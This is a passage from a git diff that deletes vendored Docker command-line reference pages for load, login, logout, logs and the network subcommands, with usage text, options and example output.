-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# load
-
-```markdown
-Usage:  docker load [OPTIONS]
-
-Load an image from a tar archive or STDIN
-
-Options:
-      --help           Print usage
-  -i, --input string   Read from tar archive file, instead of STDIN.
-                       The tarball may be compressed with gzip, bzip, or xz
-  -q, --quiet          Suppress the load output but still outputs the imported images
-```
-
-Loads a tarred repository from a file or the standard input stream.
-Restores both images and tags.
-
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    $ docker load < busybox.tar.gz
-    # […]
-    Loaded image: busybox:latest
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
-    $ docker load --input fedora.tar
-    # […]
-    Loaded image: fedora:rawhide
-    # […]
-    Loaded image: fedora:20
-    # […]
-    $ docker images
-    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
-    busybox             latest              769b9341d937        7 weeks ago         2.489 MB
-    fedora              rawhide             0d20aec6529d        7 weeks ago         387 MB
-    fedora              20                  58394af37342        7 weeks ago         385.5 MB
-    fedora              heisenbug           58394af37342        7 weeks ago         385.5 MB
-    fedora              latest              58394af37342        7 weeks ago         385.5 MB
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/login.md b/vendor/github.com/docker/docker/docs/reference/commandline/login.md
deleted file mode 100644
index a0f35fd4d0..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/login.md
+++ /dev/null
@@ -1,122 +0,0 @@
----
-title: "login"
-description: "The login command description and usage"
-keywords: "registry, login, image"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# login
-
-```markdown
-Usage:  docker login [OPTIONS] [SERVER]
-
-Log in to a Docker registry.
-If no server is specified, the default is defined by the daemon.
-
-Options:
-      --help              Print usage
-  -p, --password string   Password
-  -u, --username string   Username
-```
-
-If you want to login to a self-hosted registry you can specify this by
-adding the server name.
-
-    example:
-    $ docker login localhost:8080
-
-
-`docker login` requires user to use `sudo` or be `root`, except when:
-
-1.  connecting to a remote daemon, such as a `docker-machine` provisioned `docker engine`.
-2.  user is added to the `docker` group.  This will impact the security of your system; the `docker` group is `root` equivalent.  See [Docker Daemon Attack Surface](https://docs.docker.com/security/security/#docker-daemon-attack-surface) for details.
-
-You can log into any public or private repository for which you have
-credentials.  When you log in, the command stores encoded credentials in
-`$HOME/.docker/config.json` on Linux or `%USERPROFILE%/.docker/config.json` on Windows.
-
-## Credentials store
-
-The Docker Engine can keep user credentials in an external credentials store,
-such as the native keychain of the operating system. Using an external store
-is more secure than storing credentials in the Docker configuration file.
-
-To use a credentials store, you need an external helper program to interact
-with a specific keychain or external store. Docker requires the helper
-program to be in the client's host `$PATH`.
-
-This is the list of currently available credentials helpers and where
-you can download them from:
-
-- D-Bus Secret Service: https://github.com/docker/docker-credential-helpers/releases
-- Apple macOS keychain: https://github.com/docker/docker-credential-helpers/releases
-- Microsoft Windows Credential Manager: https://github.com/docker/docker-credential-helpers/releases
-
-### Usage
-
-You need to specify the credentials store in `$HOME/.docker/config.json`
-to tell the docker engine to use it:
-
-```json
-{
-	"credsStore": "osxkeychain"
-}
-```
-
-If you are currently logged in, run `docker logout` to remove
-the credentials from the file and run `docker login` again.
-
-### Protocol
-
-Credential helpers can be any program or script that follows a very simple protocol.
-This protocol is heavily inspired by Git, but it differs in the information shared.
-
-The helpers always use the first argument in the command to identify the action.
-There are only three possible values for that argument: `store`, `get`, and `erase`.
-
-The `store` command takes a JSON payload from the standard input. That payload carries
-the server address, to identify the credential, the user name, and either a password
-or an identity token.
-
-```json
-{
-	"ServerURL": "https://index.docker.io/v1",
-	"Username": "david",
-	"Secret": "passw0rd1"
-}
-```
-
-If the secret being stored is an identity token, the Username should be set to
-`<token>`.
-
-The `store` command can write error messages to `STDOUT` that the docker engine
-will show if there was an issue.
-
-The `get` command takes a string payload from the standard input. That payload carries
-the server address that the docker engine needs credentials for. This is
-an example of that payload: `https://index.docker.io/v1`.
-
-The `get` command writes a JSON payload to `STDOUT`. Docker reads the user name
-and password from this payload:
-
-```json
-{
-	"Username": "david",
-	"Secret": "passw0rd1"
-}
-```
-
-The `erase` command takes a string payload from `STDIN`. That payload carries
-the server address that the docker engine wants to remove credentials for. This is
-an example of that payload: `https://index.docker.io/v1`.
-
-The `erase` command can write error messages to `STDOUT` that the docker engine
-will show if there was an issue.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md b/vendor/github.com/docker/docker/docs/reference/commandline/logout.md
deleted file mode 100644
index 1635e2244b..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/logout.md
+++ /dev/null
@@ -1,30 +0,0 @@
----
-title: "logout"
-description: "The logout command description and usage"
-keywords: "logout, docker, registry"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# logout
-
-```markdown
-Usage:  docker logout [SERVER]
-
-Log out from a Docker registry.
-If no server is specified, the default is defined by the daemon.
-
-Options:
-      --help   Print usage
-```
-
-For example:
-
-    $ docker logout localhost:8080
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/logs.md
deleted file mode 100644
index 891e10b55c..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/logs.md
+++ /dev/null
@@ -1,66 +0,0 @@
----
-title: "logs"
-description: "The logs command description and usage"
-keywords: "logs, retrieve, docker"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# logs
-
-```markdown
-Usage:  docker logs [OPTIONS] CONTAINER
-
-Fetch the logs of a container
-
-Options:
-      --details        Show extra details provided to logs
-  -f, --follow         Follow log output
-      --help           Print usage
-      --since string   Show logs since timestamp
-      --tail string    Number of lines to show from the end of the logs (default "all")
-  -t, --timestamps     Show timestamps
-```
-
-The `docker logs` command batch-retrieves logs present at the time of execution.
-
-> **Note**: this command is only functional for containers that are started with
-> the `json-file` or `journald` logging driver.
-
-For more information about selecting and configuring logging drivers, refer to
-[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/).
-
-The `docker logs --follow` command will continue streaming the new output from
-the container's `STDOUT` and `STDERR`.
-
-Passing a negative number or a non-integer to `--tail` is invalid and the
-value is set to `all` in that case.
-
-The `docker logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants)
-, for example `2014-09-16T06:17:46.000000000Z`, to each
-log entry. To ensure that the timestamps are aligned the
-nano-second part of the timestamp will be padded with zero when necessary.
-
-The `docker logs --details` command will add on extra attributes, such as
-environment variables and labels, provided to `--log-opt` when creating the
-container.
-
-The `--since` option shows only the container logs generated after
-a given date. You can specify the date as an RFC 3339 date, a UNIX
-timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date
-format you may also use RFC3339Nano, `2006-01-02T15:04:05`,
-`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
-timezone on the client will be used if you do not provide either a `Z` or a
-`+-00:00` timezone offset at the end of the timestamp. When providing Unix
-timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
-that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
-seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
-fraction of a second no more than nine digits long. You can combine the
-`--since` option with either or both of the `--follow` or `--tail` options.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md b/vendor/github.com/docker/docker/docs/reference/commandline/menu.md
deleted file mode 100644
index d58afacd76..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/menu.md
+++ /dev/null
@@ -1,28 +0,0 @@
----
-title: "Command line reference"
-description: "Docker's CLI command description and usage"
-keywords: "Docker, Docker documentation, CLI, command line"
-identifier:  "smn_cli"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# The Docker commands
-
-This section contains reference information on using Docker's command line
-client. Each command has a reference page along with samples. If you are
-unfamiliar with the command line, you should start by reading about how to
-[Use the Docker command line](cli.md).
-
-You start the Docker daemon with the command line. How you start the daemon
-affects your Docker containers. For that reason you should also make sure to
-read the [`dockerd`](dockerd.md) reference page.
-
-For a list of Docker commands see [Command line reference guide](index.md).
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
deleted file mode 100644
index 52459a5d5f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md
+++ /dev/null
@@ -1,100 +0,0 @@
----
-title: "network connect"
-description: "The network connect command description and usage"
-keywords: "network, connect, user-defined"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# network connect
-
-```markdown
-Usage:  docker network connect [OPTIONS] NETWORK CONTAINER
-
-Connect a container to a network
-
-Options:
-      --alias value           Add network-scoped alias for the container (default [])
-      --help                  Print usage
-      --ip string             IP Address
-      --ip6 string            IPv6 Address
-      --link value            Add link to another container (default [])
-      --link-local-ip value   Add a link-local address for the container (default [])
-```
-
-Connects a container to a network. You can connect a container by name
-or by ID. Once connected, the container can communicate with other containers in
-the same network.
-
-```bash
-$ docker network connect multi-host-network container1
-```
-
-You can also use the `docker run --network=<network-name>` option to start a container and immediately connect it to a network.
-
-```bash
-$ docker run -itd --network=multi-host-network busybox
-```
-
-You can specify the IP address you want to be assigned to the container's interface.
-
-```bash
-$ docker network connect --ip 10.10.36.122 multi-host-network container2
-```
-
-You can use `--link` option to link another container with a preferred alias
-
-```bash
-$ docker network connect --link container1:c1 multi-host-network container2
-```
-
-`--alias` option can be used to resolve the container by another name in the network
-being connected to.
-
-```bash
-$ docker network connect --alias db --alias mysql multi-host-network container2
-```
-You can pause, restart, and stop containers that are connected to a network.
-A container connects to its configured networks when it runs.
-
-If specified, the container's IP address(es) is reapplied when a stopped
-container is restarted. If the IP address is no longer available, the container
-fails to start. One way to guarantee that the IP address is available is
-to specify an `--ip-range` when creating the network, and choose the static IP
-address(es) from outside that range. This ensures that the IP address is not
-given to another container while this container is not on the network.
-
-```bash
-$ docker network create --subnet 172.20.0.0/16 --ip-range 172.20.240.0/20 multi-host-network
-```
-
-```bash
-$ docker network connect --ip 172.20.128.2 multi-host-network container2
-```
-
-To verify the container is connected, use the `docker network inspect` command. Use `docker network disconnect` to remove a container from the network.
-
-Once connected in network, containers can communicate using only another
-container's IP address or name. For `overlay` networks or custom plugins that
-support multi-host connectivity, containers connected to the same multi-host
-network but launched from different Engines can also communicate in this way.
-
-You can connect a container to one or more networks. The networks need not be the same type. For example, you can connect a single container bridge and overlay networks.
-
-## Related information
-
-* [network inspect](network_inspect.md)
-* [network create](network_create.md)
-* [network disconnect](network_disconnect.md)
-* [network ls](network_ls.md)
-* [network rm](network_rm.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
-* [Work with networks](https://docs.docker.com/engine/userguide/networking/work-with-networks/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
deleted file mode 100644
index e238217d41..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_create.md
+++ /dev/null
@@ -1,202 +0,0 @@
----
-title: "network create"
-description: "The network create command description and usage"
-keywords: "network, create"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# network create
-
-```markdown
-Usage:	docker network create [OPTIONS] NETWORK
-
-Create a network
-
-Options:
-      --attachable           Enable manual container attachment
-      --aux-address value    Auxiliary IPv4 or IPv6 addresses used by Network
-                             driver (default map[])
-  -d, --driver string        Driver to manage the Network (default "bridge")
-      --gateway value        IPv4 or IPv6 Gateway for the master subnet (default [])
-      --help                 Print usage
-      --internal             Restrict external access to the network
-      --ip-range value       Allocate container ip from a sub-range (default [])
-      --ipam-driver string   IP Address Management Driver (default "default")
-      --ipam-opt value       Set IPAM driver specific options (default map[])
-      --ipv6                 Enable IPv6 networking
-      --label value          Set metadata on a network (default [])
-  -o, --opt value            Set driver specific options (default map[])
-      --subnet value         Subnet in CIDR format that represents a
-                             network segment (default [])
-```
-
-Creates a new network. The `DRIVER` accepts `bridge` or `overlay` which are the
-built-in network drivers. If you have installed a third party or your own custom
-network driver you can specify that `DRIVER` here also. If you don't specify the
-`--driver` option, the command automatically creates a `bridge` network for you.
-When you install Docker Engine it creates a `bridge` network automatically. This
-network corresponds to the `docker0` bridge that Engine has traditionally relied
-on. When you launch a new container with  `docker run` it automatically connects to
-this bridge network. You cannot remove this default bridge network, but you can
-create new ones using the `network create` command.
-
-```bash
-$ docker network create -d bridge my-bridge-network
-```
-
-Bridge networks are isolated networks on a single Engine installation. If you
-want to create a network that spans multiple Docker hosts each running an
-Engine, you must create an `overlay` network. Unlike `bridge` networks, overlay
-networks require some pre-existing conditions before you can create one. These
-conditions are:
-
-* Access to a key-value store. Engine supports Consul, Etcd, and ZooKeeper (Distributed store) key-value stores.
-* A cluster of hosts with connectivity to the key-value store.
-* A properly configured Engine `daemon` on each host in the cluster.
-
-The `dockerd` options that support the `overlay` network are:
-
-* `--cluster-store`
-* `--cluster-store-opt`
-* `--cluster-advertise`
-
-To read more about these options and how to configure them, see ["*Get started
-with multi-host network*"](https://docs.docker.com/engine/userguide/networking/get-started-overlay).
-
-While not required, it is a good idea to install Docker Swarm to
-manage the cluster that makes up your network. Swarm provides sophisticated
-discovery and server management tools that can assist your implementation.
-
-Once you have prepared the `overlay` network prerequisites you simply choose a
-Docker host in the cluster and issue the following to create the network:
-
-```bash
-$ docker network create -d overlay my-multihost-network
-```
-
-Network names must be unique. The Docker daemon attempts to identify naming
-conflicts but this is not guaranteed. It is the user's responsibility to avoid
-name conflicts.
-
-## Connect containers
-
-When you start a container, use the `--network` flag to connect it to a network.
-This example adds the `busybox` container to the `mynet` network:
-
-```bash
-$ docker run -itd --network=mynet busybox
-```
-
-If you want to add a container to a network after the container is already
-running, use the `docker network connect` subcommand.
-
-You can connect multiple containers to the same network. Once connected, the
-containers can communicate using only another container's IP address or name.
-For `overlay` networks or custom plugins that support multi-host connectivity,
-containers connected to the same multi-host network but launched from different
-Engines can also communicate in this way.
-
-You can disconnect a container from a network using the `docker network
-disconnect` command.
-
-## Specifying advanced options
-
-When you create a network, Engine creates a non-overlapping subnetwork for the
-network by default. This subnetwork is not a subdivision of an existing
-network. It is purely for ip-addressing purposes. You can override this default
-and specify subnetwork values directly using the `--subnet` option. On a
-`bridge` network you can only create a single subnet:
-
-```bash
-$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0
-```
-
-Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address`
-options.
-
-```bash
-$ docker network create \
-  --driver=bridge \
-  --subnet=172.28.0.0/16 \
-  --ip-range=172.28.5.0/24 \
-  --gateway=172.28.5.254 \
-  br0
-```
-
-If you omit the `--gateway` flag the Engine selects one for you from inside a
-preferred pool. For `overlay` networks and for network driver plugins that
-support it you can create multiple subnetworks.
-
-```bash
-$ docker network create -d overlay \
-  --subnet=192.168.0.0/16 \
-  --subnet=192.170.0.0/16 \
-  --gateway=192.168.0.100 \
-  --gateway=192.170.0.100 \
-  --ip-range=192.168.1.0/24 \
-  --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \
-  --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \
-  my-multihost-network
-```
-
-Be sure that your subnetworks do not overlap. If they do, the network create
-fails and Engine returns an error.
-
-# Bridge driver options
-
-When creating a custom network, the default network driver (i.e. `bridge`) has
-additional options that can be passed. The following are those options and the
-equivalent docker daemon flags used for docker0 bridge:
-
-| Option                                           | Equivalent  | Description                                           |
-|--------------------------------------------------|-------------|-------------------------------------------------------|
-| `com.docker.network.bridge.name`                 | -           | bridge name to be used when creating the Linux bridge |
-| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading                                |
-| `com.docker.network.bridge.enable_icc`           | `--icc`     | Enable or Disable Inter Container Connectivity        |
-| `com.docker.network.bridge.host_binding_ipv4`    | `--ip`      | Default IP when binding container ports               |
-| `com.docker.network.driver.mtu`                  | `--mtu`     | Set the containers network MTU                        |
-
-The following arguments can be passed to `docker network create` for any
-network driver, again with their approximate equivalents to `docker daemon`.
-
-| Argument     | Equivalent     | Description                                |
-|--------------|----------------|--------------------------------------------|
-| `--gateway`  | -              | IPv4 or IPv6 Gateway for the master subnet |
-| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range                  |
-| `--internal` | -              | Restrict external access to the network   |
-| `--ipv6`     | `--ipv6`       | Enable IPv6 networking                     |
-| `--subnet`   | `--bip`        | Subnet for network                         |
-
-For example, let's use `-o` or `--opt` options to specify an IP address binding
-when publishing ports:
-
-```bash
-$ docker network create \
-    -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \
-    simple-network
-```
-
-### Network internal mode
-
-By default, when you connect a container to an `overlay` network, Docker also
-connects a bridge network to it to provide external connectivity. If you want
-to create an externally isolated `overlay` network, you can specify the
-`--internal` option.
-
-## Related information
-
-* [network inspect](network_inspect.md)
-* [network connect](network_connect.md)
-* [network disconnect](network_disconnect.md)
-* [network ls](network_ls.md)
-* [network rm](network_rm.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
deleted file mode 100644
index 42e976a500..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md
+++ /dev/null
@@ -1,43 +0,0 @@
----
-title: "network disconnect"
-description: "The network disconnect command description and usage"
-keywords: "network, disconnect, user-defined"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# network disconnect
-
-```markdown
-Usage:  docker network disconnect [OPTIONS] NETWORK CONTAINER
-
-Disconnect a container from a network
-
-Options:
-  -f, --force   Force the container to disconnect from a network
-      --help    Print usage
-```
-
-Disconnects a container from a network. The container must be running to disconnect it from the network.
-
-```bash
-  $ docker network disconnect multi-host-network container1
-```
-
-
-## Related information
-
-* [network inspect](network_inspect.md)
-* [network connect](network_connect.md)
-* [network create](network_create.md)
-* [network ls](network_ls.md)
-* [network rm](network_rm.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
deleted file mode 100644
index bc0005e38e..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md
+++ /dev/null
@@ -1,192 +0,0 @@
----
-title: "network inspect"
-description: "The network inspect command description and usage"
-keywords: "network, inspect, user-defined"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# network inspect
-
-```markdown
-Usage:  docker network inspect [OPTIONS] NETWORK [NETWORK...]
-
-Display detailed information on one or more networks
-
-Options:
-  -f, --format string   Format the output using the given Go template
-      --help            Print usage
-```
-
-Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network:
-
-```bash
-$ sudo docker run -itd --name=container1 busybox
-f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27
-
-$ sudo docker run -itd --name=container2 busybox
-bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727
-```
-
-The `network inspect` command shows the containers, by id, in its
-results. For networks backed by multi-host network driver, such as Overlay,
-this command also shows the container endpoints in other hosts in the
-cluster. These endpoints are represented as "ep-{endpoint-id}" in the output.
-However, for swarm-scoped networks, only the endpoints that are local to the
-node are shown.
-
-You can specify an alternate format to execute a given
-template for each result. Go's
-[text/template](http://golang.org/pkg/text/template/) package describes all the
-details of the format.
-
-```bash
-$ sudo docker network inspect bridge
-[
-    {
-        "Name": "bridge",
-        "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f",
-        "Created": "2016-10-19T04:33:30.360899459Z",
-        "Scope": "local",
-        "Driver": "bridge",
-        "IPAM": {
-            "Driver": "default",
-            "Config": [
-                {
-                    "Subnet": "172.17.42.1/16",
-                    "Gateway": "172.17.42.1"
-                }
-            ]
-        },
-        "Internal": false,
-        "Containers": {
-            "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": {
-                "Name": "container2",
-                "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019",
-                "MacAddress": "02:42:ac:11:00:02",
-                "IPv4Address": "172.17.0.2/16",
-                "IPv6Address": ""
-            },
-            "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": {
-                "Name": "container1",
-                "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad",
-                "MacAddress": "02:42:ac:11:00:01",
-                "IPv4Address": "172.17.0.1/16",
-                "IPv6Address": ""
-            }
-        },
-        "Options": {
-            "com.docker.network.bridge.default_bridge": "true",
-            "com.docker.network.bridge.enable_icc": "true",
-            "com.docker.network.bridge.enable_ip_masquerade": "true",
-            "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0",
-            "com.docker.network.bridge.name": "docker0",
-            "com.docker.network.driver.mtu": "1500"
-        },
-        "Labels": {}
-    }
-]
-```
-
-Returns the information about the user-defined network:
-
-```bash
-$ docker network create simple-network
-69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a
-$ docker network inspect simple-network
-[
-    {
-        "Name": "simple-network",
-        "Id": "69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a",
-        "Created": "2016-10-19T04:33:30.360899459Z",
-        "Scope": "local",
-        "Driver": "bridge",
-        "IPAM": {
-            "Driver": "default",
-            "Config": [
-                {
-                    "Subnet": "172.22.0.0/16",
-                    "Gateway": "172.22.0.1"
-                }
-            ]
-        },
-        "Containers": {},
-        "Options": {},
-        "Labels": {}
-    }
-]
-```
-
-For swarm mode overlay networks `network inspect` also shows the IP address and node name 
-of the peers. Peers are the nodes in the swarm cluster which have at least one task attached 
-to the network. Node name is of the format `<hostname>-<unique ID>`.
-
-```bash
-$ docker network inspect ingress
-[
-    {
-        "Name": "ingress",
-        "Id": "j0izitrut30h975vk4m1u5kk3",
-        "Created": "2016-11-08T06:49:59.803387552Z",
-        "Scope": "swarm",
-        "Driver": "overlay",
-        "EnableIPv6": false,
-        "IPAM": {
-            "Driver": "default",
-            "Options": null,
-            "Config": [
-                {
-                    "Subnet": "10.255.0.0/16",
-                    "Gateway": "10.255.0.1"
-                }
-            ]
-        },
-        "Internal": false,
-        "Attachable": false,
-        "Containers": {
-            "ingress-sbox": {
-                "Name": "ingress-endpoint",
-                "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115",
-                "MacAddress": "02:42:0a:ff:00:03",
-                "IPv4Address": "10.255.0.3/16",
-                "IPv6Address": ""
-            }
-        },
-        "Options": {
-            "com.docker.network.driver.overlay.vxlanid_list": "256"
-        },
-        "Labels": {},
-        "Peers": [
-            {
-                "Name": "net-1-1d22adfe4d5c",
-                "IP": "192.168.33.11"
-            },
-            {
-                "Name": "net-2-d55d838b34af",
-                "IP": "192.168.33.12"
-            },
-            {
-                "Name": "net-3-8473f8140bd9",
-                "IP": "192.168.33.13"
-            }
-        ]
-    }
-]
-```
-
-## Related information
-
-* [network disconnect ](network_disconnect.md)
-* [network connect](network_connect.md)
-* [network create](network_create.md)
-* [network ls](network_ls.md)
-* [network rm](network_rm.md)
-* [network prune](network_prune.md)
-* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
deleted file mode 100644
index a4f671d569..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md
+++ /dev/null
@@ -1,218 +0,0 @@
----
-title: "network ls"
-description: "The network ls command description and usage"
-keywords: "network, list, user-defined"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# docker network ls
-
-```markdown
-Usage:  docker network ls [OPTIONS]
-
-List networks
-
-Aliases:
-  ls, list
-
-Options:
-  -f, --filter filter   Provide filter values (e.g. 'driver=bridge')
-      --format string   Pretty-print networks using a Go template
-      --help            Print usage
-      --no-trunc        Do not truncate the output
-  -q, --quiet           Only display network IDs
-```
-
-Lists all the networks the Engine `daemon` knows about. This includes the
-networks that span across multiple hosts in a cluster, for example:
-
-```bash
-$ sudo docker network ls
-NETWORK ID          NAME                DRIVER          SCOPE
-7fca4eb8c647        bridge              bridge          local
-9f904ee27bf5        none                null            local
-cf03ee007fb4        host                host            local
-78b03ee04fc4        multi-host          overlay         swarm
-```
-
-Use the `--no-trunc` option to display the full network id:
-
-```bash
-$ docker network ls --no-trunc
-NETWORK ID                                                         NAME                DRIVER           SCOPE
-18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3   none                null             local
-c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47   host                host             local
-7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185   bridge              bridge           local
-95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd   foo                 bridge           local
-63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161   dev                 bridge           local
-```
-
-## Filtering
-
-The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
-is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
-Multiple filter flags are combined as an `OR` filter. For example,
-`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks.
-
-The currently supported filters are:
-
-* driver
-* id (network's id)
-* label (`label=<key>` or `label=<key>=<value>`)
-* name (network's name)
-* type (custom|builtin)
-
-#### Driver
-
-The `driver` filter matches networks based on their driver.
-
-The following example matches networks with the `bridge` driver:
-
-```bash
-$ docker network ls --filter driver=bridge
-NETWORK ID          NAME                DRIVER            SCOPE
-db9db329f835        test1               bridge            local
-f6e212da9dfd        test2               bridge            local
-```
-
-#### ID
-
-The `id` filter matches on all or part of a network's ID.
-
-The following filter matches all networks with an ID containing the
-`63d1ff1f77b0...` string.
-
-```bash
-$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161
-NETWORK ID          NAME                DRIVER           SCOPE
-63d1ff1f77b0        dev                 bridge           local
-```
-
-You can also filter for a substring in an ID as this shows:
-
-```bash
-$ docker network ls --filter id=95e74588f40d
-NETWORK ID          NAME                DRIVER          SCOPE
-95e74588f40d        foo                 bridge          local
-
-$ docker network ls --filter id=95e
-NETWORK ID          NAME                DRIVER          SCOPE
-95e74588f40d        foo                 bridge          local
-```
-
-#### Label
-
-The `label` filter matches networks based on the presence of a `label` alone or a `label` and a
-value.
-
-The following filter matches networks with the `usage` label regardless of its value.
-
-```bash
-$ docker network ls -f "label=usage"
-NETWORK ID          NAME                DRIVER         SCOPE
-db9db329f835        test1               bridge         local
-f6e212da9dfd        test2               bridge         local
-```
-
-The following filter matches networks with the `usage` label with the `prod` value.
-
-```bash
-$ docker network ls -f "label=usage=prod"
-NETWORK ID          NAME                DRIVER        SCOPE
-f6e212da9dfd        test2               bridge        local
-```
-
-#### Name
-
-The `name` filter matches on all or part of a network's name.
-
-The following filter matches all networks with a name containing the `foobar` string.
-
-```bash
-$ docker network ls --filter name=foobar
-NETWORK ID          NAME                DRIVER       SCOPE
-06e7eef0a170        foobar              bridge       local
-```
-
-You can also filter for a substring in a name as this shows:
-
